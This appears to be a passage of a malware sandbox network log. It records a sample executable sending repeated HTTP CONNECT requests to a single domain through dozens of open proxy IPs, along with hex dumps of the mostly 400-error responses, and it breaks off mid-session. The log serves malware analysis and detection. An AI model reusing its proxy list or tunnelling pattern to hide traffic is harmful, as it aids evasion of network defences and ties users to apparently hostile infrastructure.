                                                                                                      Feb 23, 2024 09:45:35.334939957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1618192.168.2.452430209.145.56.51361956812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.175436974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1619192.168.2.45229779.143.187.58179056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.179074049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179177999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1620192.168.2.454640172.67.219.60806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.179753065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.268560886 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:29 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1621192.168.2.454251188.132.222.7080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.179958105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.428678989 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1622192.168.2.454634103.113.71.23031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.180217028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.647001028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.240875959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.334589958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.443996906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.647090912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.740911961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1623192.168.2.45444492.205.61.38486646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.180413961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.834399939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1624192.168.2.454580203.89.8.107806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.205614090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.943871975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.071399927 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.22.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1625192.168.2.454588182.106.220.25290916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.205909967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.568243980 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:51 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1626192.168.2.454455195.177.217.131337216812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.241933107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.365761042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1627192.168.2.454382185.158.114.14265866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.254662037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1628192.168.2.454624125.122.26.24210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.262141943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1629192.168.2.453597175.183.82.22181936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.262821913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1630192.168.2.45427147.100.207.11780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.312000036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.650377035 CET590INHTTP/1.1 400
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Language: en
                                                                                                      Content-Length: 435
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 30 20 e2 80 93 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 400 Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 Bad Request</h1></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1631192.168.2.454627103.164.106.9856786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.312055111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1632192.168.2.454625124.70.78.15780006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.312165976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1633192.168.2.45463345.177.80.21010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.336785078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1634192.168.2.454652104.17.239.10806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.362560987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.450330973 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:29 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1635192.168.2.454657104.19.5.247806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.369918108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.457426071 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:29 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1636192.168.2.454448196.223.129.21806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.379277945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.365838051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.366323948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1637192.168.2.454433103.57.211.9231286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.379992962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.377521992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.443937063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1638192.168.2.454651192.252.216.8141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.389036894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1639192.168.2.4543751.15.62.1256786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.389103889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1640192.168.2.454209117.160.250.163816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.420993090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.009712934 CET221INHTTP/1.1 403 Access Denied
                                                                                                      Date: Fri, 23 Feb 2024 08:45:29 GMT
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-store
                                                                                                      Content-Type: text/html
                                                                                                      Content-Language: en
                                                                                                      Content-Length: 43
                                                                                                      Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                      Data Ascii: You are not allowed to access the document.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1641192.168.2.454492104.238.228.20131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.421253920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.519690990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.647113085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1642192.168.2.45463727.75.148.5210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.421417952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1643192.168.2.454516142.54.232.641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.422857046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1644192.168.2.45254738.255.72.689996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.424494982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.198522091 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1645192.168.2.454200117.160.250.163806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.444266081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.118617058 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:29 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1646192.168.2.45465427.77.237.9310806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.727277994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1647192.168.2.454468175.183.82.22181976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.727283001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1648192.168.2.452443132.148.129.254183616812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:29.727478027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
